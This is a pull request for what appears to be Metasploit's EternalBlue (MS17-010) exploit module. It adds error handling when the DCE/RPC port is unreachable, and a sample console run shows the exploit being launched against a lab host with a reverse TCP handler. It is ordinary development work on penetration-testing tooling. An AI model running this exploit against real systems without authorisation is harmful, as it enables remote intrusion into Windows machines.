### PR TITLE
rescue connection failure for DCE/RPC with ETERNALBLUE, suggest how to fix it

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -263,10 +263,20 @@ class MetasploitModule < Msf::Exploit::Remote
       '71710533-beba-4937-8319-b5dbef9ccc36', '1.0'
     ).first
 
-    sock = connect(false,
-      'RHOST' => rhost,
-      'RPORT' => 135
-    )
+    begin
+      sock = connect(false,
+        'RHOST' => rhost,
+        'RPORT' => 135
+      )
+    rescue ::Errno::ECONNRESET,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionRefused  => e
+      print_error(e.to_s)
+      print_warning('Target arch not detected for target OS')
+      print_warning('Disable VerifyArch option to proceed manually...')
+      return false
+    end
 
     sock.put(pkt)
 


### PR DESCRIPTION
This fixes #8486 by rescuing the connection attempt and failing nicely.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/ms17_010_eternalblue`
- [x] target a Windows box with port 135 firewalled
- [x] **Verify** that the module now suggests how to resolve the issue
- [x] **Verify** that disabling VerifyArch allows it to proceed.

Sample run below:
```
msf exploit(ms17_010_eternalblue) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] 192.168.56.101:445 - Connecting to target for exploitation.
[+] 192.168.56.101:445 - Connection established for exploitation.
[*] 192.168.56.101:445 - CORE raw buffer dump (19 bytes)
[*] 192.168.56.101:445 - 0x00000000  57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36  Windows 10 Pro 6
[*] 192.168.56.101:445 - 0x00000010  2e 33 00                                         .3             
[-] 192.168.56.101:445 - The connection timed out (192.168.56.101:135).
[!] 192.168.56.101:445 - Target arch not detected for target OS
[!] 192.168.56.101:445 - Disable VerifyArch option to proceed manually...
[-] 192.168.56.101:445 - Unable to continue with improper OS Arch.


[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > 
msf exploit(ms17_010_eternalblue) > 
msf exploit(ms17_010_eternalblue) > set VerifyArch false
VerifyArch => false
msf exploit(ms17_010_eternalblue) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] 192.168.56.101:445 - Connecting to target for exploitation.
[+] 192.168.56.101:445 - Connection established for exploitation.
[*] 192.168.56.101:445 - CORE raw buffer dump (19 bytes)
[*] 192.168.56.101:445 - 0x00000000  57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36  Windows 10 Pro 6
[*] 192.168.56.101:445 - 0x00000010  2e 33 00                                         .3             
[*] 192.168.56.101:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.101:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.101:445 - Sending NT Trans Request packet
```